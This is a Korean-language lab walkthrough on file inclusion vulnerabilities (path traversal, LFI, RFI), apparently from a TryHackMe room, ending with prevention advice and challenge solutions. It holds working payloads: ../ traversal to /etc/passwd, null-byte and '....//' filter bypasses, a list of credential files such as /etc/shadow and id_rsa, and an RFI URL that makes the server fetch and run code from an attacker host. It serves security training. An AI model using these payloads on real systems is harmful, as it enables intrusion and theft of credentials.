file inclusion
#
`file inclusion 이란`

일부 시나리오에서 웹 애플리케이션은 매개변수를 통해 이미지, 정적 텍스트 등을 포함하여 지정된 시스템의 파일에 대한 액세스를 요청하도록 작성됩니다.

다음 그래프는 URL의 필수 부분을 설명하고 분류합니다. 

![image](https://user-images.githubusercontent.com/61821641/150377223-7d5e5394-cec6-44bd-83ed-5f91ba17c32a.png)

사용자가 웹 서버에서 파일 액세스를 요청하는 시나리오에 대해 논의해 보겠습니다.  

먼저 사용자는 표시할 파일이 포함된 HTTP 요청을 웹 서버에 보냅니다. 예를 들어 사용자가 웹에서 CV에 액세스하려는 경우 요청은  http://webapp.thm/get.php?file=userCV.pdf 와 같이 표시될 수 있습니다 . 여기서 파일은 매개변수이고 userCV.pdf 는 액세스하는 데 필요한 파일입니다.

![image](https://user-images.githubusercontent.com/61821641/150377640-b327db0f-96a4-4cdc-9ee5-69f517df3d6e.png)


`file inclusion 취약점은 왜 발생합니까?`

file inclusion 취약점은 제대로 작성되지 않은 PHP와 같은 웹용  다양한 프로그래밍 언어에서 발견되고 악용됩니다. 이런 취약점의 주요 문제는 ​​입력 유효성 검사입니다. 입력이 검증되지 않으면 사용자는 어떤 입력이든 함수에 전달할 수 있어 취약점을 유발할 수 있습니다.

`file inclusion의 위험은 무엇입니까?`

때에 따라 다릅니다. 공격자가 파일 포함 취약점을 사용하여 민감한 데이터를 읽을 수 있는지 여부. 이 경우 공격이 성공하면 웹 애플리케이션과 관련된 코드 및 파일, 백엔드 시스템의 자격 증명을 비롯한 민감한 데이터가 누출됩니다. 또한 공격자가 어떻게든 /tmp 디렉토리와 같은 서버에 쓸 수 있다면  원격 명령 실행 RCE를 얻을 수 있습니다. 그러나 민감한 데이터에 대한 접근이 불가능하고 서버에 대한 쓰기 기능이 없는 상태에서 파일 포함 취약점이 발견되면 효과적이지 않습니다.

#
`Path Traversal (Directory Traversal)`

경로  탐색 취약점은 사용자의 입력이 PHP 의 [file_get_contents](https://www.php.net/manual/en/function.file-get-contents.php)와 같은 함수에 전달될 때 발생합니다 . 이 기능이 취약점의 주요 원인이 아니라는 점에 유의하는 것이 중요합니다. 잘못된 입력 유효성 검사 또는 필터링이 취약점의 원인입니다. PHP 에서는 file_get_contents를 사용하여 파일의 내용을 읽을 수 있습니다. 

다음 그래프는 웹 애플리케이션이 /var/www/app 에 파일을 저장하는 방법을 보여줍니다 . `happy path`는 정의된 경로 /var/www/app/CVs 에서 userCV.pdf의 내용을 요청하는 사용자 입니다.

![image](https://user-images.githubusercontent.com/61821641/150381378-5105761a-b0ff-4160-ad9f-d69543cdbb94.png)

웹 애플리케이션이 어떻게 작동하는지 보기 위해 페이로드를 추가하여 URL 매개변수를 테스트할 수 있습니다. `dot-dot-slash` 공격 이라고도 하는 경로 탐색 공격 은 이중 점 `../` 을 사용하여 디렉토리를 한 단계 위로 이동하는 이점을 활용합니다. 공격자가 진입점(이 경우 get.php?file= )을 찾으면 공격자는 http://webapp.thm/get.php?file=../../../../etc/passwd 와 같이 무언가를 보낼 수 있습니다.


입력 유효성 검사가 없고 /var/www/app/CVs 위치의 PDF 파일에 액세스하는 대신 웹 응용 프로그램이 다른 디렉터리(이 경우 /etc/passwd )에서 파일을 검색한다고 가정합니다 . 각 .. 항목은 루트 디렉토리 / 에 도달할 때까지 한 디렉토리를 이동합니다. 그런 다음 디렉토리를 /etc 로 변경하고 거기에서 passwd 파일을 읽습니다.

![image](https://user-images.githubusercontent.com/61821641/150382134-f6540b35-9b76-4fec-8703-3b6fb544078d.png)

결과적으로 웹은 파일의 내용을 사용자에게 다시 보냅니다.

![image](https://user-images.githubusercontent.com/61821641/150382212-2cfd0844-e363-4fee-a83d-50d7ace32f45.png)

마찬가지로 웹 응용 프로그램이 Windows 서버에서 실행되는 경우 공격자는 Windows 경로를 제공해야 합니다. 예를 들어 공격자가 c:\boot.ini 에 있는 boot.ini 파일 을 읽으려는 경우 공격자는 대상 OS 버전 에 따라 다음을 시도할 수 있습니다 .

`http://webapp.thm/get.php?file=../../../../boot.ini`  또는

`http://webapp.thm/get.php?file=../../../../windows/win.ini`

Linux 운영 체제 와 동일한 개념이 여기에 적용됩니다. 여기서 일반적으로 `c:\` 인 루트 디렉토리에 도달할 때까지 디렉토리를 올라갑니다.

때때로 개발자는 필터를 추가하여 특정 파일이나 디렉토리에 대한 액세스를 제한합니다. 다음은  테스트할 때 사용할 수 있는 몇 가지 일반적인 OS 파일입니다. 

| **위치** | **설명** |
| --- | --- |
| /etc/issue | 로그인 프롬프트 전에 인쇄할 메시지 또는 시스템 ID를 포함합니다. |
| /etc/profile | 내보내기 변수, 파일 생성 마스크(umask), 터미널 유형, 새 메일이 도착했을 때 표시하는 메일 메시지 와 같은 시스템 전체 기본 변수를 제어합니다.  |
| /proc/version | Linux 커널 의 버전을 지정합니다. |
| /etc/passwd | 시스템에 액세스할 수 있는 모든 등록된 사용자가 있습니다. |
| /etc/shadow | 시스템 사용자의 암호에 대한 정보를 포함합니다. |
| /root/.bash_history | 루트 사용자에 대한 기록 명령이 포함되어 있습니다.    |
| /var/log/dmessage | 시스템 시작 중에 기록되는 메시지를 포함하여 전역 시스템 메시지를 포함합니다. |
| /var/mail/root | 루트 사용자 의 모든 이메일 |
| /root/.ssh/id_rsa | 루트 또는 서버의 알려진 유효한 사용자에 대한 개인 SSH 키 |
| /var/log/apache2/access.log | Apache  웹 서버 에 대한 액세스 요청 |
| C:\\boot.ini | BIOS 펌웨어가 있는 컴퓨터의 부팅 옵션이 포함되어 있습니다. |

#
`LFI(Local File Inclusion)`

웹에서 LFI 공격은 개발자의 보안 인식 부족으로 인해 발생합니다. PHP 에서 include , require , include_once, require_once 와 같은 기능을 사용 하면 종종 취약한 웹 애플리케이션에 기여합니다. ASP, JSP, Node.js 앱과 같은 다른 언어를 사용할 때도 LFI 취약점이 발생한다는 점에 주목할 가치가 있습니다. LFI 익스플로잇은 경로 탐색과 동일한 개념을 따릅니다.

`다양한 LFI 시나리오`

1. 웹이 두 가지 언어를 제공하고 사용자가 EN과  AR 중에서 선택할 수 있다고 가정합니다.

```
<?PHP 
	include($_GET["lang"]);
?>
```

위의 PHP 코드는 URL 매개 변수 lang을 통해 GET 요청을 사용하여 페이지의 파일을 포함합니다. 호출은 HTTP 요청을 전송하여 수행할 수 있습니다. http://webapp.thm/index.php?lang=EN.php는 영어 페이지를 로드하거나 http://webapp.thm/index?p.pang=ARP는 아랍어 페이지를 로드합니다. 

이론적으로 입력 유효성 검사가 없다면 위의 코드에서 서버에 있는 읽을 수 있는 모든 파일에 액세스하여 표시할 수 있습니다. Linux 운영 체제 사용자에 대한 중요한 정보가 들어 있는 /etc/passwd 파일을 읽으려고 하면 http://webapp.thm/get.file=/etc/passwd를 시도해 볼 수 있습니다.  

이 경우 include 함수에 지정된 디렉터리가 없고 입력 유효성 검사가 없기 때문에 작동합니다.

```
/lab1.php?file=/etc/passwd
```

![image](https://user-images.githubusercontent.com/61821641/150405519-d51201b9-bfb7-4e8f-ba3f-13d00bbd0ca9.png)

2. 다음 코드에서 개발자는 함수 내부에 디렉토리를 지정하기로 결정했습니다.
```
<?PHP 
	include("languages/". $_GET['lang']); 
?>
```

위의 코드에서 개발자는  lang 매개변수를 통해서만  언어 디렉토리의 PHP 페이지를 호출하기 위해 include함수를 사용하기로 결정했습니다.

입력 유효성 검사가 없는 경우 공격자는 lang 입력을 /etc/passwd  와 같은 다른 OS에 민감한 파일로 교체하여 URL을 조작할 수 있습니다.

다시 페이로드는 경로 순회와 유사해 보이지만 include 함수를 사용하면 호출된 파일을 현재 페이지에 포함할 수 있습니다. 
```
/etc/passwd
```
![image](https://user-images.githubusercontent.com/61821641/150405848-3d61c443-7088-4308-8fad-bc1d3ccded59.png)
```
../../../../etc/passwd
```
![image](https://user-images.githubusercontent.com/61821641/150405938-d1879d20-e14f-4a1a-b412-cf7ff4449c25.png)

3. 처음 두 경우에는 웹 앱의 코드를 확인한 다음 이를 악용하는 방법을 알았습니다. 하지만 이 경우에는 소스코드가 없는 블랙박스 테스트를 진행하고 있습니다. 이 경우 데이터가 웹 앱으로 전달되고 처리되는 방식을 이해하는 데 오류가 중요합니다.

이 시나리오에는 http://webapp.thm/index.php?lang=EN 진입점이  있습니다. THM과 같은 잘못된 입력을 입력하면 다음 오류가 발생합니다.

```
Warning: include(languages/THM.php): failed to open stream: No such file or directory in /var/www/html/THM-4/index.php on line 12
```
![image](https://user-images.githubusercontent.com/61821641/150404644-9e579963-c4ae-490d-b27f-2cf570789ce5.png)

오류 메시지는 중요한 정보를 공개합니다. THM을 입력으로 입력하면 오류 메시지가 include funcion의 모양을 보여줍니다. `include(languages/THM.php); ` 

디렉토리를 자세히 살펴보면 디렉토리가 항목 끝에 `.php`를 추가하는 language 파일을 포함하는 함수를 알 수 있습니다. 따라서 유효한 입력은 다음과 같습니다. `index.php?lang = EN`, 여기서 파일 EN은 주어진 language 디렉토리 안에 위치하고 EN.php로 명명됩니다. 

또한 오류 메시지는 `/ var / www / html / THM-4 /`인 전체 웹 응용 프로그램 디렉토리 경로에 대한 또 다른 중요한 정보를 공개했습니다. 이를 이용하려면 디렉토리 탐색 섹션에서 설명한 `../` 트릭을 사용하여 현재 폴더를 꺼내야 합니다. `http://webapp.thm/index.php?lang=.././././etc/passwd` 경로에 /var/www/html/THM-4의 `4단계`가 있다는 것을 알고 있기 때문에 ../를 4번 사용했습니다. 그러나 여전히 다음과 같은 오류를 받습니다.

```
Warning: include(languages/../../../../../etc/passwd.php): failed to open stream: No such file or directory in /var/www/html/THM-4/index.php on line 12
```

PHP 디렉터리에서 벗어날 수 있는 것처럼 보이지만, 여전히 include 함수는 끝에 .php로 입력을 읽습니다. 이것은 개발자가 include 함수에서 전달할 파일 형식을 지정한다는 것을 알려줍니다. 

이 시나리오를 우회하기 위해, 우리는 %00인 `NULL BYTE`를 사용할 수 있습니다. null 바이트 사용은 사용자가 제공한 데이터와 함께 %00 또는 0x00과 같은 URL 인코딩된 표현을 16진수로 사용하여 문자열을 종료하는 주입 기법입니다. 웹 앱을 속여서 널 바이트 뒤에 오는 것을 무시하려고 하는 것이라고 생각할 수 있습니다. 페이로드의 끝에 Null 바이트를 추가함으로써, 우리는 다음과 같이 보일 수 있는 Null 바이트 뒤의 모든 것을 무시하도록 포함 함수를 지시합니다. 

`include("language/../../../../../etc/passwd%00").".php");` 는  →  `include("language/../../../../../etc/passwd")`와 동일합니다.

(참고: %00 트릭은 수정되었으며 PHP 5.3.4 이상에서 작동하지 않습니다.)
```
/lab3.php?file=../../../../etc/passwd%00
```

![image](https://user-images.githubusercontent.com/61821641/150405365-50f2c7bb-ccf7-473e-a96b-55127cc5f667.png)

4. 개발자는 민감한 정보가 노출되지 않도록 키워드를 필터링하기로 결정했습니다! /etc/passwd 파일 이 필터링되고 있습니다. 필터를 우회하는 두 가지 가능한 방법이 있습니다. 먼저 NullByte `%00` 또는 필터링된 키워드 `/.` 필터링된 키워드 끝에 있는 현재 디렉터리 트릭을 사용합니다. . 익스플로잇은 http://webapp.thm/index.php?lang=/etc/passwd/와 유사합니다. http://webapp.thm/index.php?lang=/etc/passwd%00 을 사용할 수도 있습니다 .

좀 더 명확히 하기 위해, 만약 우리가 `cd ..`를 시도한다면, 한 디렉토리 위로 갈 것입니다. `cd .`를 할 경우, 현재 디렉토리에 남아 있습니다. 마찬가지로 `/etc/passwd/..`를 시도하면 /etc/가 되는데, 이는 우리가 루트로 이동했기 때문입니다. `/etc/passwd/.`를 시도하면 점이 현재 디렉토리를 참조하므로 결과는 `/etc/passwd`가 됩니다.

![image](https://user-images.githubusercontent.com/61821641/150406935-a5ba088b-830e-41e7-a741-59974105485e.png)

5. 개발자는 일부 키워드를 필터링하여 입력 유효성 검사를 사용하기 시작합니다.
```
Warning: include(includes/etc/passwd/.) [function.include]: failed to open stream: No such file or directory in /var/www/html/lab5.php on line 28
```
![image](https://user-images.githubusercontent.com/61821641/150407270-d7541138-7068-48ba-8882-e93e5094649a.png)

`include(languages/etc/passwd)` 섹션 에서 경고 메시지를 확인하면  웹 애플리케이션이 `../`를 빈 문자열로  대체한다는 것을 알 수  있습니다. 이를 우회하기 위해 사용할 수 있는 몇 가지 기술이 있습니다.

```
....//....//....//....//....//etc/passwd
```
위의 페이로드로 이를 우회할 수 있습니다.

![image](https://user-images.githubusercontent.com/61821641/150407524-d1df12de-aa17-46c4-885d-4e6bf1ca8e56.png)

이것은 PHP 필터가 첫 번째 부분 집합 문자열 ../과만 일치하고 replace 하기 때문에 작동합니다.

![image](https://user-images.githubusercontent.com/61821641/150407659-05851e40-6ce8-4eee-af3a-099ebf199825.png)

#
`RFI(Remote File Inclusion)`

RFI(Remote File Inclusion)는 원격 파일을 취약한 응용 프로그램에 포함시키는 기술입니다. LFI와 마찬가지로 RFI는 사용자 입력을 부적절하게 처리할 때 발생하여 공격자가 `include` function에 외부 URL을 삽입할 수 있습니다. RFI에 대한 한 가지 요구 사항은 `allow_url_fopen` 옵션이 켜져 있어야 한다는 것 입니다.

RFI 취약성을 통해 공격자는 서버에서 RCE(Remote Command Execution)를 얻을 수 있으므로 RFI의 위험은 LFI보다 높습니다. RFI 공격이 성공하면 다음과 같은 결과를 얻을 수 있습니다. 
- 중요 정보 노출 
- Cross Site Scripting(XSS)
- 서비스 거부(DoS) 

공격자가 서버에서 악의적인 파일을 호스팅하는 RFI 공격이 성공하려면 외부 서버가 응용 프로그램 서버와 통신해야 합니다. 그런 다음 HTTP 요청을 통해 악성 파일이 include 함수에 주입되고, 취약한 응용 프로그램 서버에서 악성 파일의 내용이 실행됩니다.

![image](https://user-images.githubusercontent.com/61821641/150409068-e301a48e-4a87-49c0-a7a7-647f2cc92774.png)

`RFI 단계`

다음 그림은 성공적인 RFI 공격을 위한 단계의 예입니다! 공격자 가 자신의 서버 `http://attacker.thm/cmd.txt` 에서 PHP 파일을 호스팅한다고 가정해 봅시다 . 여기서 cmd.txt 에는 `Hello THM` 이라는 print 메시지가 포함되어 있습니다.
```
<?PHP echo "Hello THM"; ?>
```

먼저 공격자는 `http://webapp.thm/index.php?lang=http://attacker.thm/cmd.txt` 와 같이 공격자의 서버를 가리키는 악성 URL을 주입합니다. 입력 유효성 검사가 없으면 악성 URL이 포함 기능으로 전달됩니다. 다음으로 웹 앱 서버는 파일을 가져오기 위해 악성 서버에 GET 요청을 보냅니다. 결과적으로 웹 앱은 원격 파일을 `include` function 에 포함시켜 페이지 내에서 PHP 파일을 실행하고 실행 내용을 공격자에게 보냅니다. 위의 경우, 현재 어딘가에 있는 페이지는 Hello THM 메시지를 보여줘야 합니다.

```
/playground.php?file=http://10.10.62.101/lab1.php
```
![image](https://user-images.githubusercontent.com/61821641/150409976-ebb4c438-00b5-4c09-a53e-862f21e69bc6.png)

#
`예방`

1. 웹 애플리케이션 프레임워크를 포함한 시스템 및 서비스를 최신 버전으로 업데이트하세요.
2. 응용 프로그램 및 기타 잠재적으로 노출되는 정보의 경로가 누출되지 않도록 PHP 오류를 끄십시오 .
3. WAF(웹 응용 프로그램 방화벽)는 웹 응용 프로그램 공격을 완화하는 데 도움이 되는 좋은 옵션입니다.
4. 웹 앱에 필요하지 않은 경우 파일 포함 취약점을 유발하는 일부 PHP 기능(예: allow_url_fopen on 및 allow_url_include )을 비활성화하십시오 .
5. 웹 애플리케이션을 주의 깊게 분석하고 필요한 프로토콜과 PHP 래퍼만 허용합니다.
6. 사용자 입력을 절대 신뢰하지 말고 파일 포함에 대해 적절한 입력 유효성 검사를 구현해야 합니다.
7. 파일 이름과 위치에 대한 화이트리스트와 블랙리스트를 구현합니다.

#
`Challenge`

```
http://10.10.62.101/challenges/index.php
```

1. /etc/flag1

[힌트#1] 페이지 소스에서 양식 메소드를 POST로 변경하거나 Burp와 같은 도구를 사용하여 요청 POST의 메소드를 수정하십시오.

![image](https://user-images.githubusercontent.com/61821641/150412973-e61fd118-85f4-4eb6-9bc6-f549b67a16af.png)

```
curl -X POST http://10.10.62.101/challenges/chall1.php -d 'method=GET&file=/etc/flag1'
```

![image](https://user-images.githubusercontent.com/61821641/150413298-8a2491bd-591a-4be6-9245-59178b86161b.png)

2. /etc/flag2

[힌트#1] 쿠키를 확인하세요!

![image](https://user-images.githubusercontent.com/61821641/150413923-bc4c610c-7ae2-4cf4-91d4-a7b97f5f5a73.png)

![image](https://user-images.githubusercontent.com/61821641/150413979-c5b25dd8-0236-46e8-8b2f-3bd76cf0c198.png)

![image](https://user-images.githubusercontent.com/61821641/150414157-fc96c44e-2e98-4484-b261-cc61c42e2ab0.png)

![image](https://user-images.githubusercontent.com/61821641/150414214-ed16bd66-cd17-49b8-8f3b-bdf5fa9514e7.png)

![image](https://user-images.githubusercontent.com/61821641/150414544-fd60d3da-f6d2-4f86-a4ad-a6a4c5e3ac73.png)

![image](https://user-images.githubusercontent.com/61821641/150414426-3c1bb5fc-1e3c-4387-ac34-296594008b41.png)

3. /etc/flag3

[힌트#1] 모든 것이 필터링되는 것은 아닙니다! 

[힌트 #2] 웹사이트는 HTTP 요청을 수락하기 위해 $_REQUESTS를 사용합니다. 그것을 이해하고 그것이 무엇을 받아들이는지 조사하십시오!

```
curl -X POST http://10.10.62.101/challenges/chall3.php -d 'method=POST&file=../../../../etc/flag3%00' --output -
```

![image](https://user-images.githubusercontent.com/61821641/150416401-5f5609df-fb99-4847-83eb-34bd49ddc149.png)

4. 
RFI를 사용하여 Lab #Playground /playground.php 에서 RCE를 획득하여 hostname 명령을 실행합니다.

![image](https://user-images.githubusercontent.com/61821641/150417137-9138d7b7-4dbf-473e-8e10-58e04d37b7a4.png)

![image](https://user-images.githubusercontent.com/61821641/150417280-68be959c-8c6b-46ad-94a1-9a8da976eb39.png)

```
http://10.10.62.101/playground.php?file=http://10.9.4.27:8000/cmd.txt
```

![image](https://user-images.githubusercontent.com/61821641/150417708-11156eb2-e05e-40d2-b67d-65c3fcb4de7a.png)

![image](https://user-images.githubusercontent.com/61821641/150415053-99e9501b-8176-4bab-b3d2-962590622656.png)

